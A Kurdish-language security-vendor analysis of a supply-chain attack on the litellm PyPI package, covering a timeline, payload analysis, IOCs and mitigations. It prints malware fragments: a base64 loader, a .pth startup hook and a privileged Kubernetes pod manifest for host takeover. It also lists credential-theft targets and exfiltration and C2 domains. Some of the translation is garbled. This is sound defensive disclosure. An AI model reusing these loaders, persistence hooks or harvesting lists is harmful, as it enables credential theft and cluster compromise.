Êrîşa Zincîra Dabînkirinê ya LiteLLM

Êrîşa Zincîra Dabînkirinê ya LiteLLM: Çawa TeamPCP Binesaziya AI-ê Paşve Xist

Çima Ev Girîng e

Di 24ê Adara 2026an de, pakêta Pythonê ya populer litellm, dergehek proxy ya LLM ya gerdûnî ku ji hêla bi hezaran kesan ve tê bikar anîn enterprises ji bo rêkirina trafîkê di navbera sepanan û dabînkerên AI-ê yên wekî OpenAI, Anthropic, Google, û AWS Bedrock de, bi bêdengî li ser PyPI-ê hate xeter kirin. Du guhertoyên jehrîkirî (1.82.7 û 1.82.8) di nav 13 hûrdeman de ji hev hatin weşandin, barekî pir-qonaxî hilgirtin ku bawernameyan dizî, sirên ewr derxist, li seranserê komên Kubernetes belav bû, û deriyek paşîn a domdar bi şiyanên darvekirina kodê ji dûr ve saz kir.

Bi nêzîkî 3.6 milyon dakêşanên rojane û bicîhkirina kûr li seranserê binesaziya AI ya xwemalî ya ewr, litellm li ser xaçerêya her tiştê ku êrîşkarên nûjen dixwazin e: mifteyên API ji bo her dabînkerê sereke yê AI, bawernameyên IAM-ê yên ewr, razên Kubernetes, û mifteyên SSH.

Lê belê lihevkirina kurt ne bûyerek tenê bû. Ew encama kampanyaya pênc rojî, pênc-ekosîstem ji hêla aktorekî gefê ve ku wekî Tîma PCP, kampanyayek ku pêşî skanerên ewlehiyê (Aqua Trivy, Checkmarx KICS) jehrî kirin, dû re jî yên dizî bi kar anîn CI/CD bawernameyan ji bo ber bi jêr ve ber bi npm, OpenVSX, û di dawiyê de PyPI ve werin avêtin. Êrîşkaran heman amûrên ku rêxistin ji bo parastina zincîrên dabînkirina xwe pê ve girêdayî ne, bi çek bikar anîn.

Ev êrîş guhertinek gav bi gav di sofîstîkebûna gefên zincîra dabînkirinê de temsîl dike. Sêwirana pir-hop, cross-ekosîstem, amûrên ewlehiyê dixe xeterê da ku bigihîje nirxek bilind. Binesaziya AI, Astek plansazkirin û gihîştina operasyonel nîşan dide ku bi amûrên êrîşê yên her ku diçe bazirganîtir dibe re lihevhatî ye. Barkêş di wextê rast de hatin dubarekirin (sê guhertoyên barkêş di koda çavkaniyê de xuya dibin, di nav de guhertoyên berê yên ku şîrove lê hatine kirin), binesaziya C2 rojek beriya êrîşê hate tomar kirin, û qadên derxistinê bi baldarî hatin hilbijartin da ku binesaziya firoşkarên rewa teqlîd bikin. Berhevkarê bawernameyê yê bi sîstematîk berfireh, ku zêdetirî 15 kategoriyan vedihewîne, di nav de hedefên nişê yên wekî mifteyên îmzekirina Cardano û mîhengên WireGuard, pileyek berfirehbûnê pêşniyar dike ku ber bi pêşkeftina malware ya bi alîkariya AI wekî pirzêkerek hêzê ve nîşan dide.

Timeline

Dîrok (UTC) Bûyer
March 19 TeamPCP tagên Aqua Trivy GitHub Action tag dike, û wan bi koda xerabkar diguherîne ku derdikeve. CI/CD razên ji depoyên jêrîn
March 21 Lihevkirin bi karanîna teknîkên wekhev digihêje Checkmarx KICS û AST GitHub Actions.
22ê Adarê, 06:35 BerriAI litellm 1.82.6 (guhertoya paşîn a paşîn) bi normalê diweşîne CI/CD pipeline ku Trivy ji bo şopandina ewlehiyê bikar tîne
March 23 TeamPCP models.litellm.cloud (domaina derxistinê) tomar dike. Zêdetirî 66 pakêtên npm û dirêjkirinên OpenVSX xeternak dike.
24ê Adarê, 10:39 litellm 1.82.7 li PyPI-yê hate weşandin -- barkêş tê de hate derzîkirin proxy_server.py di çarçoveya modulê de. Di dema importkirinê de tê bicîhanîn
24ê Adarê, 10:52 litellm 1.82.8 13 deqîqe şûnda hate weşandin -- zêde dike litellm_init.pth, çengelek mîhengkirina rêya Pythonê ku li ser her destpêkirina wergêra Pythonê tê xebitandin, ne tenê litellm importkirin. Dubarekirina barkirinê ya bilez nîşan dide.
24ê Adarê, ~16:00 PyPI piştî raporên civakê her du guhertoyan radike. Versiyon bi tevahî ji navnîşanê têne jêbirin (ne têne kişandin), her çend tarballên CDN-ê hîn jî gihîştinî dimînin.

Pencereya pêşandanê: nêzîkî 5.5 demjimêran. Di vê demê de, her pip install litellm, pip install --upgrade litellm, an jî CI/CD pipeline kişandina guhertoya herî dawî dê barkêşiyê bicîh bianiya.

Çawa Malware Kete Hundir: Lihevhatina Cascading

Pakêta litellm rasterast nehatibû desteserkirin. Êrîşkar bi rêya êrîşa zincîra dabînkirinê ya du-hop:

Aqua Trivy GitHub Action (compromised March 19)     --> LiteLLM CI/CD pipeline runs Trivy without pinned version         --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner             --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI

LiteLLM's CI/CD pipeline Trivy wekî skanerek ewlehiyê bi kar anî - amûra ku ji bo girtina qelsiyan hatibû çêkirin bi xwe vektorê êrîşê bû. Ji ber ku pipeline Trivy bi etîketa guhêrbar ve hate referans kirin li şûna pinned commit SHA, çalakiya tawanbar bixweber pêk hat. Çalakiya Trivy ya xerabkar sirên jîngehê, tevî PYPI_PUBLISH nîşanek, ku gihîştina weşanê ya rasterast dide TeamPCP-ê ji bo projeya litellm PyPI.

Ev stratejiya "parêzvanan tawîz bidin" nîşaneya kampanyaya TeamPCP ye. Bi hedefgirtina pêşî ya amûrên ewlehiyê (Trivy, Checkmarx KICS), êrîşkaran di heman demê de tespîtkirin neçalak kirin û gihîştina îmtiyazî ya zincîrên dabînkirinê yên jêrîn bi dest xistin.

Analîza Teknîkî: Barkêş

Xalên Derzîkirinê

version 1.82.7 — Cihbicîkirina asta modulê di litellm/proxy/proxy_server.py (rêza 128):

import subprocess, base64, sys, tempfile, os  b64_payload = "<~12KB base64 blob>"  with tempfile.TemporaryDirectory() as d:     p = os.path.join(d, "p.py")     with open(p, "wb") as f:         f.write(base64.b64decode(b64_payload))     subprocess.run([sys.executable, p])

Ev kod di çarçoveya modulê de di navbera ferhengoka literal û orîjînal de ye. showwarning() fonksiyonê. Ew tavilê tê bicîhanîn dema ku litellm.proxy.proxy_server tê hinartin — ku di her karanîna fonksiyona proxy ya litellm de diqewime.

version 1.82.8 - Zêde kirin litellm_init.pth (Pelê mîhengkirina rêya Python):

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) 

python .pth pelan in site-packages/ di her destpêkirina wergêr de têne pêvajokirin, lê tenê rêzikên ku bi import wekî kod têne bicîhanîn. Êrîşkar vê yekê bi zincîrkirina tevahiya barkêşiyê li ser yekane bikar tîne. import îfade: import os, subprocess, sys; subprocess.Popen(...)Ev ji derzîkirina proxy_server.py pir êrîşkartir e - ew di her destpêkirina pêvajoya Pythonê de, her çend litellm qet neyê importkirin jî, tê çalakirin. pyproject.toml ji bo ku ev pel di belavkirinê de cih bigire hate guhertin:

include = [     { path = "litellm_init.pth", format = ["sdist", "wheel"] } ]

Ji ber vê yekê guhertoya 1.82.8 heye du rêyên darvekirinê yên serbixwe: derzîkirina proxy_server.py (li ser importkirina proxy ya litellm çalak dibe) û pelê .pth (li ser her destpêkirina Python çalak dibe). Dubarebûn bi xwe girîng e - ew li dijî tespîtkirin an rakirina her du rêyan bi tena serê xwe diparêze. Zêdebûna ji dema importkirinê ber bi dema destpêkirinê tenê 13 hûrdem piştî 1.82.7 nîşan dide ku êrîşkar serkeftina bicihkirinê dişopand û bi lez dubare dikir.

Qonaxa 1: Berhevkirina Bawernameyan a Berfireh

Nivîsara hundirîn a deşîfrekirî valahiyek bawernameyê ya hûrgulî ye. Ew bikar tîne os.walk()glob.glob()subprocess.check_output(), û pelê rasterast dixwîne da ku tevahiya pergalê paqij bike:

Liq armancên
Vejandina sîstemê hostname, whoami, uname -a, ip addr, printenv, ip route
SSH ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; mifteyên mêvandar ji /etc/ssh/
Ewr (AWS) ~/.aws/credentials, ~/.aws/config; Bawernameyên rola IMDS bi rêya 169.254.169.254Rêveberê Nehêniyan ListSecretsSSM DescribeParameters
Ewr (GCP) ~/.config/gcloud/ (dubare); $GOOGLE_APPLICATION_CREDENTIALS
Ewr (Azûr) ~/.azure/ (dubare); guherbarên jîngehê
Kubernetes Nîşaneyên hesabê xizmetê; ca.crt; navcî; kubectl get secrets --all-namespaces; hemû raz bi rêya API-ya K8s
Pelên jîngehê .env, .env.local, .env.production, .env.development, .env.staging — bi awayekî dubarekirî (kûrahiya 6) li seranserê lêgerîn /home, /root, /opt, /srv, /var/www, /app, /data, /tmp
Docker ~/.docker/config.json, /kaniko/.docker/config.json
Nîşaneyên pakêtê ~/.npmrc, ~/.vault-token, ~/.netrc
Databases ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf, Mîhengên MongoDB
TLS/SSL Mifteyên taybet ji /etc/ssl/private/, Werin em hemû sertîfîkayan şîfre bikin .pem/.key/.p12/.pfx files
herin ~/.git-credentials, ~/.gitconfig
CI/CD terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg
Wallets Crypto Bitcoin, depoya mifteyên Ethereum, cotên mifteyên Solana (pejirandin, dengdan, pişk, faucet), mifteyên îmzekirina Cardano, Litecoin, Dogecoin, Zcash, Dash, Ripple, Monero
Dîroka Qalikê .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history
Destûra sîstemê /etc/passwd, /etc/shadow, tomarên destûrdayînê (danişînên SSH yên pejirandî)
Kilîtên Webhook/API Grep ji bo malpera Slackhooks, Tora Discordhooks, mifteyên/razên API-yê di pelên mîhengê de
VPN Mîhengên WireGuard ji /etc/wireguard/

Qada vê berhevkerê ansîklopedîk e. Ew ne tenê nasnameyên ewr, lê di heman demê de berîkên krîptopereyan, şîfreyên databasan, mîhengên VPN û CI/CD razên - ku nîşan dide ku êrîşkar dixwaze pergalên xeternak li ser gelek vektoran pere qezenc bike.

Qonaxa 2: Derxistina şîfrekirî

Agahiyên dizîkirî bi karanîna sîstemeke şîfrekirinê ya hîbrîd têne şîfrekirin û derxistin:

  • AES-256-CBC şîfrekirina hemû daneyên berhevkirî bi mifteyek danişînê ya 32-bayî ya rasthatî (bi rêya openssl enc)
  • RSA-4096 şîfrekirina mifteya danişînê bi karanîna mifteya giştî ya çêkirî ya êrîşkar (dagirtina OAEP, bi rêya openssl pkeyutl)
  • Herdu pelên şîfrenivîsê wekî tpcp.tar.gz (ew tpcp pêşgir — "TeamPCP" — bi berdewamî li seranserê kampanyayê xuya dibe)
  • HTTPS POST bo https://models.litellm.cloud/ bi Content-Type: application/octet-stream

The domain models.litellm.cloud di 23ê Adarê de - rojek berî êrîşê - hate tomar kirin û ji bo ku bi binesaziya rewa ya litellm re were tevlihev kirin hatiye sêwirandin (projeya rastîn bikar tîne) litellm.ai). Heta parêzvanekî ku ji torê haydar e û trafîka derketinê dinirxîne jî, dibe ku trafîkê nîşan nede ber bi xala dawî ya modela litellm bi xwe.

Qonaxa 3: Deriyê Paşve yê Berdewam (sysmon.py)

Barkêş deriyekî paşîn ê anketê saz dike ku wekî telemetriya pergalê veşartî ye:

  • Şop~/.config/sysmon/sysmon.py
  • Xizmetkarsysmon.service (yekîneya bikarhênerê systemd, ku wekî "Xizmeta Telemetrîya Sîstemê" tê binavkirin)
  • XwenîşandinîPiştî xewa destpêkê ya 300 saniyeyan, anket https://checkmarx.zone/raw her ~50 deqîqeyan
  • BirêverbirîURL-ya ku ji hêla C2 ve hatî vegerandin dakêşîne /tmp/pglog, wê wekî pêkanînê destnîşan dike (chmod 755), wê di danişînek cuda de dimeşîne
  • Şopandina dewletê/tmp/.pg_state ji nû ve dakêşana heman barkêşiyê asteng dike
  • Li sersekinîRestart=alwaysRestartSec=10 - ji têkçûn û ji nû ve destpêkirinê sax dimîne

The domain checkmarx.zone çapkerekî Checkmarx (şîrketa ewlehiyê li) ye checkmarx.com), bi awayekî hatiye sêwirandin ku analîstên SOC-ê yên ku tomarên torê dinirxînin, trafîka ber bi tiştê ku xuya dike firoşkarek ewlehiyê ya rewa ye bibînin. Ev teknîkek dûrketina bi zanebûn e ku lihevhatî ye bi stratejiya berfirehtir a TeamPCP-ê ya veşartina li pişt marqeya firoşkarê ewlehiyê.

Qonaxa 3b: Tevgera Aliyê Kubernetes

Ger pergala têkçûyî xwedî bawernameyên hesabê karûbarê Kubernetes be, malware hemî girêkên klusterê navnîş dike û bicîh dike. kapsulên îmtiyazî ji her yekî re:

pod_manifest = {     'apiVersion': 'v1', 'kind': 'Pod',     'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'},     'spec': {         'nodeName': node_name,         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'name': 'setup',             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}],         'restartPolicy': 'Never'     } }

Her peldank:

  • Wekî dixebite îmtiyaz kirin bi hostPIDhostNetwork, û gihîştina tevahî ya pergala pelan a mêvandar
  • hewcedariyên chroot /host ji bo sazkirina heman sysmon.py deriyê paşîn li ser pergala pelê ya root a mêvandar
  • Wê wekî karûbarek systemd tomar dike, piştrast dike ku mayînde piştî jêbirina podê jî sax dimîne.
  • bi navê node-setup-* di kube-system namespace wekî binesaziya klusterê ya rewa xuya bibe

Ev tê wateya a yekane tawîzdayî CI/CD gerokek bi gihîştina K8 dikare bibe sedema ku her girêkek di komê de ji paş ve were girtin - senaryoyek tevgera lateral a karesatbar ji bo rêxistinên ku litellm wekî cîgir di Kubernetes de dimeşînin.

Pêşveçûna Barkêşiyê (Guhertoyên Şîrovekirî)

Koda çavkaniyê ya li rêzên 131-132 du guhertoyên barkêşiyê yên berê yên ku şîrove lê nehatine kirin dihewîne, ku pêvajoya pêşveçûna êrîşkar eşkere dike:

  • Her sê guhertoyên heman binesaziya derxistinê parve dikin (models.litellm.cloud), mifteya giştî ya RSA-4096, pêça şîfrekirina hîbrîd a AES-256-CBC + RSA, û tpcp.tar.gz navlêkirina pakêtê
  • Guhertoyên berê zêde kir Qata şîfrekirinê ya RC4 di hundirê skrîpta berhevkirina daneyan de, şîfrekirina daneyên berhevkirî berî pêça derve ya AES+RSA. Barkêşiya çalak (rêza 130) bi rakirina vê qata hundirîn a RC4 hêsankirî ye.
  • Guhertoyên berê yên ku hatine bikar anîn exec() bi StringIO girtinê da ku berhevkar di pêvajoyê de bixebite, dema ku barkêşiya çalak bikar tîne subprocess.run() bi beralîkirina stdout re - veqetandinek paqijtir ku ji qirêjkirina pêvajoya mêvandar dûr dikeve
  • Her sê guhertoyên heman kategoriyên bawernameyê û rêyên berhevkirinê hedef digirin
  • Bişkojka RC4 di guhertoyên berê de heqareteke provokatîf bû, ku li gorî tevgera balkişandina lîstikvan li ser Telegramê bû.

Ev yek pêşketineke çalak di dema operasyonê de nîşan dide. Êrîşkar stûna şîfrekirinê hêsan kir û îzolasyona pêkanînê baştir kir di heman demê de hedefên berhevkirinê û binesaziya derxistinê stabîl hişt.

Nîşaneyên Lihevhatinê (IOC)

Têkelî

indicator Awa Armanc
models.litellm.cloud Domain Xala dawîn a derxistinê (HTTPS POST)
checkmarx.zone Domain Xala dawî ya anketê ya C2 (HTTPS GET /raw)

Têbînî: Girêdanên raporên derveyî checkmarx.zone/static/checkmarx-util-1.0.4.tgz bo qonaxa KICS ya berê ya kampanyaya TeamPCP. Ev URL di barkirinên litellm ên li vir hatine analîzkirin de nehat dîtin.

Haşên Pakêtan

Wêne SHA256
litellm-1.82.7.tar.gz 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea
litellm-1.82.8.tar.gz d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5

Pergala pelê

indicator Awa Armanc
~/.config/sysmon/sysmon.py Wêne Skrîpta deriyê paşîn a domdar
~/.config/systemd/user/sysmon.service Wêne Yekîneya domdar a Systemd
/tmp/pglog Wêne Binarya qonaxa duyemîn a dakêşandî
/tmp/.pg_state Wêne Şopandina rewşa C2
litellm_init.pth in site-packages/ Wêne Çengê destpêkirina Pythonê (tenê v1.82.8)
tpcp.tar.gz Wêne Pakêta derxistina şîfrekirî

Kubernetes

indicator Awa Armanc
node-setup-* kapsulên di nav de kube-system Pod Kapsulên tevgera alî yên îmtiyazkirî
sysmon.service li ser girêkên komê Xizmetkar Berdewamiya asta mêvandar bi rêya revîna podê

Krîptografîk

indicator Details
Mifteya giştî ya RSA-4096 ya êrîşkar Şopa tiliyê ya SHA256: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8Di her sê guhertoyên barkêşiyê de hatiye bicihkirin; heman mifte li seranserê operasyonên din ên TeamPCP-ê hatiye ragihandin.
tpcp pêşgir di berhemên hunerî de Peymana navlêkirina pakêtê (tpcp.tar.gz) li seranserê kampanyayê domdar

Danasîn: TeamPCP

Aktorê gefê yê li pişt vê kampanyayê wekî tê şopandin Tîma PCP, ku wekî PCPcat, Persy_PCP, ShellForce, û DeadCatx3 jî tê zanîn.

Taybetmendiyên naskirî:

  • Kanalên Telegramê li ser diparêze @Persy_PCP û @teampcp li ku derê wan tinazê xwe bi şîrketên ewlehiyê kirin
  • Li ser gelek ekosîsteman dixebite (GitHub Actions, PyPI, npm, OpenVSX)
  • Ji bo her qonaxa kampanyayê domainên typosquat-ê yên taybetî yên firoşkar bikar tîne (mînak, checkmarx.zone ji bo Checkmarx, models.litellm.cloud ji bo bitellm)
  • Nîşankerên binesaziyê yên hevgirtî: heman cotek mifteya RSA, tpcp.tar.gz peymana navkirinê, tpcp-docs-* Depoyên GitHub wekî amadekariyên dead-drop têne bikar anîn
  • Amûrên ewlehiyê wekî xalên têketinê bo zincîrên dabînkirinê yên jêrîn hedef digire

Baweriya destnîşankirinêBilind. Mifteya giştî ya RSA ya hevpar, tpcp navlêkirina berhemên hunerî, hevgirtina binesaziya C2, û leza operasyonê li seranserê kampanyaya pênc-rojî, lihevkirinên Trivy, KICS, npm, OpenVSX, û litellm bi heman aktorê ve girêdide.

Sorkirinî: Bi îhtimaleke mezin darayî (dizîna berîka krîpto, pere qezenckirina bawernameyên ewr) bi navûdengê xirab (henekên Telegramê). Berfirehiya berhevkirina bawernameyan - ji AWS IAM bigire heya cotên mifteyên pejirandina Solana û mîhengên WireGuard - aktorek bi motîvasyoneke darayî nîşan dide ku dixwaze ji her tawîzê ROI herî zêde bike.

Alîkariya AI ya gengazBerhevkarê bawernameyan bi awayekî sîstematîk berfireh e - 15+ kategoriyan di nav de armancên nişê yên wekî mifteyên îmzekirina Cardano, mîhengên WireGuard, û bawernameyên Kaniko Docker - bi awayekî ku bi jimartina bi alîkariya AI re lihevhatî ye. Leza dubarekirina barkêşiyê (sê guhertoyên bi şêwazên şîfrekirinê yên cûda), hevrêziya ekosîstemê (5 ekosîstem di 5 rojan de), û OPSEC-a operasyonel (domainên teqlîdkirina firoşkar, şîfrekirina hîbrîd, domdariya sîstemîk a ku wekî telemetrî veşartiye) astek hilberînê pêşniyar dike ku dibe ku pêşkeftina bi alîkariya AI wekî pirjimarkerek hêzê nîşan bide. Ev nirxandin spekulatîf e; operatorên jêhatî dikarin bêyî amûrên AI-ê bigihîjin çarçoveyek wekhev.

TTP û Teknîkên Nû

1. Jehrîbûna Zincîra Dabînkirinê ya Amûrên Ewlehiyê (guhertoya T1195.002)

Xeterekirina skanerên ewlehiyê (Trivy, KICS) wekî gava yekem ji bo gihîştina armancên jêrîn zêdebûnek nû ye. Êrîşkar ne tenê pirtûkxaneyek xistiye xeterê - wan amûrên ku rêxistin ji bo gihîştina ... bikar tînin jî xistine xeterê. binêrin pirtûkxaneyên xeternak. Ev xalek kor diafirîne: skanerê ku divê koda zirardar bigire bi xwe mekanîzmaya radestkirinê ye.

2. Python .pth Berdewamiya Pelê (T1546)

Ew litellm_init.pth teknîka di v1.82.8 de bi taybetî nebaş e. Python .pth pelan in site-packages/ di her destpêkirina wergêr de têne pêvajokirin; her rêzek ku bi import wekî kod tê bicîhanîn. Bi zincîrkirina barê li ser yekane import daxuyaniyê de, êrîşkar li ser her pêvajoyek Pythonê pêkanînê pêk tîne - ne tenê dema ku litellm tê importkirin. Ev tê vê wateyê ku barkêş tê çalakirin her çend litellm hatibe sazkirin lê qet neyê bikar anîn jî, û ew ji sererastkirina ku şûna pergala tahrîbkirî digire sax dimîne. .py pelên bêyî kontrolkirina .pth Pelan

3. Tevgera Aliyê ya Kubernetes-ê ya Berfireh a Komê bi rêya Belavkirina Podê ya Îmtiyazî (T1610, T1611)

Afirandina otomatîkî ya podên îmtiyazî li ser her girêka klusterê - bi hostPIDhostNetwork, mountkirina pergala pelan a mêvandar, û chroot ji bo sazkirina domdariyê - bicihkirina konteynerê (T1610) bi escape bo host (T1611) ve girêdide da ku karekî yekane yê têkçûyî veguherîne têkdana tevahî ya klusterê.

4. Binesaziya C2 ya ku ji hêla Pêşkêşvan ve tê teqlîdkirin

bikaranîna models.litellm.cloud (tîmîk litellm) û checkmarx.zone (mîna Checkmarx) wekî xalên dawî yên C2/exfil ji bo dûrketina ji çavdêriya torê hatiye sêwirandin. Analîstên SOC-ê yên ku trafîka derketinê dinirxînin dê girêdanên HTTPS-ê bi domainên firoşkarên rewa re bibînin.

5. Dubarekirina Bilez a Barkêşiya Di Firînê de

Weşandina v1.82.7 bi pêkanîna dema importkirinê, û dû re jî weşandina v1.82.8 bi pêkanîna dema destpêkirinê 13 hûrdem şûnda, nîşan dide ku êrîşkar di wextê rast de çavdêrî û adapteyî dike. Guhertoyên barkêşiyê yên şîrovekirî (bi şêwazên şîfrekirinê yên cûda) ku di koda çavkaniyê de têne parastin, pêşkeftina çalak di dema operasyonê de piştrast dikin.

Çi Dikare Bê Kirin

Ev êrîş baweriyê li her qatê îstismar dike: baweriya bi amûrên ewlehiyê, baweriya bi qeydên pakêtan, baweriya bi domainên naskirî, baweriya bi ... CI/CD otomasyon. Parastina li dijî wê hewce dike ku her yek ji van sînorên baweriyê hişktir bike:

Ji bo Xerîdarên Pakêtan

  • Girêdayîbûn bi haşê ve pin bike, ne tenê bi versiyonê. pip install litellm==1.82.6 --hash=sha256:... dê rê li ber sazkirina guhertoyên tahrîbkirî bigirta, her çend ew ji bo demek kurt wekî guhertoya herî dawî xuya bûn jî.
  • Pelên kilîtkirî bikar bînin. pip-compilepoetry.lock, û uv.lock guhertoyên rast û haşeyan bigire. CI/CD divê ji lockfiles were sazkirin, ne ji diyarkerên guhertoya şemitok.
  • Monitor ji bo .pth Pelan Bi rêkûpêk kontrol bikin site-packages/ ji bo neçaverêkirî .pth pelan - ew di her destpêka Pythonê de bicîh dibin û mekanîzmayeke domdariyê ya kêm nirxandî ne.
  • Kontrolên tora derketinê bicîh bînin. Derxistin bo models.litellm.cloud û dengdana C2 bo checkmarx.zone dikaribû ji hêla fîlterkirina derketinê ya li ser bingeha lîsteya destûrnameyan di jîngehên hilberînê de hatiba girtin.

Ji bo Parêzvanên Pakêtan

  • Derzî CI/CD çalakiyên ji aliyê commit SHA, ne tag. LiteLLM's pipeline Trivy bêyî guhertoyek pinkirî bikar anî. Ger referans hebûya aquasecurity/trivy-action@<commit-sha> di şona @latest, çalakiya taloqkirî dê nehata bicîhanîn.
  • Nîşaneyên weşanê yên temenkurt û bi merc bikar bînin. PyPI piştgiriyê dide Weşangerên Bawerbar (li ser bingeha OIDC) û nîşanekanên API-yê yên bi skope. PYPI_PUBLISH divê nîşanek gihîştina weşanê ya bêsînor û temendirêj nebûya.
  • Nasnameya du-faktorî li ser PyPI çalak bike. Ji bo hemî parastvanan 2FA hewce bike û li cihê ku gengaz be mifteyên ewlehiya hardware bikar bînin.
  • Pakêtan îmze bikin. Sertîfîkayên Sigstore/PEP 740 dihêle ku xerîdar piştrast bikin ku pakêtek li gorî texmînan hatiye çêkirin. CI/CD pipeline, ne ji hêla êrîşkarekî bi nîşanek dizî ve.

Ji bo Operatorên Platformê (PyPI, npm, GitHub)

  • Qalibên weşanê yên anormal tespît bikin. Du guhertoyên nû yên ku bi 13 hûrdeman ji hev cuda, ji IP an nîşanek cuda ji ya asayî hatine weşandin, divê berî ku pakêt were sazkirin, rawestandina ji bo nirxandinê an jî skankirina otomatîk çalak bikin.
  • Pejirandina Weşanxaneyên Pêbawer bilezînin. Weşanxaneya li ser bingeha OIDC pakêtan bi depo û herikên kar ên taybetî ve girêdide, û nîşanekanên dizî li derveyî orîjînalê bêkêr dike. CI/CD hevgirêk.
  • Şandina malware ya di dema weşanê de bicîh bîne. Barkêşiya deşîfrekirî ya base64-ê di proxy_server.py de dê di dema weşanê de bi analîza statîk were tesbît kirin.

Ji bo Ekosîstemê

  • Amûrên ewlehiyê wekî binesaziyek krîtîk bihesibînin. Trivy û Checkmarx KICS ji hêla bi mîlyonan ve têne bikar anîn. pipelines. Divê Çalakiyên wan ên GitHub bi heman hişkbûnê wekî pakêtên ku ew dişopînin werin îmzekirin, pinkirin û şopandin.
  • Li tespîtkirina dema xebitandinê veberhênan bikin. Analîza statîk bi tena serê xwe nikare her teknîka astengkirinê bigire. Çavdêriya sazkirina pakêtê di dema xebitandinê de hooks, girêdanên torê yên nediyar, û qalibên gihîştina gumanbar a pelan parastineke kûr peyda dike.
  • Agahdariya tehdîdan zûtir parve bikin. Pencereya eşkerekirinê ya 5.5 demjimêran ji bo litellm bi hevrêziya bileztir a firoşkarên cûda dikaribû kurttir bibûya. Xizmetên şopandina otomatîk ên wekî Xygeni MEW, Socket, û Snyk anomaliyê tespît kirin - tengasiya piştrastkirina mirovan û dema bersiva qeydê ye.

Xelasî

Kampanyaya TeamPCP ji bo vê gavê girîng e. software supply chain securityBi pêşî xistina skanerên ewlehiyê û bikaranîna wan wekî gavên ber bi binesaziya AI ya bi nirx bilind ve, êrîşkaran nîşan dan ku zincîra dabînkirinê bi qasî girêdayîbûna wê ya veguhêz a herî qels xurt e, û ew girêdayîbûn dibe ku amûra ewlehiyê be ku hûn pê bawer dikin da ku we ewle bihêle.

Lihevkirina litellm bi taybetî xetereya zêdebûyî ya ji bo binesaziya AI ronî dike. Ji ber ku dergehên proxy yên LLM dibin standard qalibek ji bo enterprise Bi bicihkirina AI, ew gihîştina mifteyên API, pêbaweriyên ewr, û daneyên hesas di yek pêkhateyê de kom dikin. Xerakirina wê pêkhateyê mifteyek îkonîk e ji bo tevahiya stîka AI.

Rêxistinên ku di pencereya 5.5 demjimêran de litellm 1.82.7 an 1.82.8 saz kirine, divê vê yekê wekî lihevkirinek pêbaweriyê ya tevahî bihesibînin: hemî razên li ser pergalên bandorkirî bizivirînin, komên Kubernetes ji bo kontrol bikin. node-setup-* kapsulên di nav de kube-system, her tiştî jê bike sysmon.service yekîneyên sîstemkirî, û kontrol bikin litellm_init.pth li Python site-packages/ rêbername. Bikarhênerên wêneya fermî ya Docker (ghcr.io/berriai/litellm) bandor nebûn, ji ber ku wêneyê girêdayîbûnên xwe girêda û di dema pencereya ekspozyonê de ji nû ve nehat çêkirin.

Derbarê Author

Hev-damezrîner & CTO

Luis Rodriguez Hev-Damezrîner û CTO li Xygeni Security ye. Bi zêdetirî 20 salan ezmûna di ewlehiya sepanan de, ew balê dikişîne ser parastina AppSec û şiyanên pêşkeftî yên analîzkirina kodê ku alîkariya tîman dikin ku rîska radestkirina rastîn kêm bikin.

 
amûrên-nermalava-berhevkirinê-ya-sca-amûran
Rîskên nermalava xwe bidin pêşanî, sererast bikin û ewle bikin
Hesabê xwe yê Belaş bistînin.
Qerta krediyê ne hewce ye.

Pêşvebirin û Radestkirina Nermalava Xwe Ewle Bike

bi Xygeni Product Suite re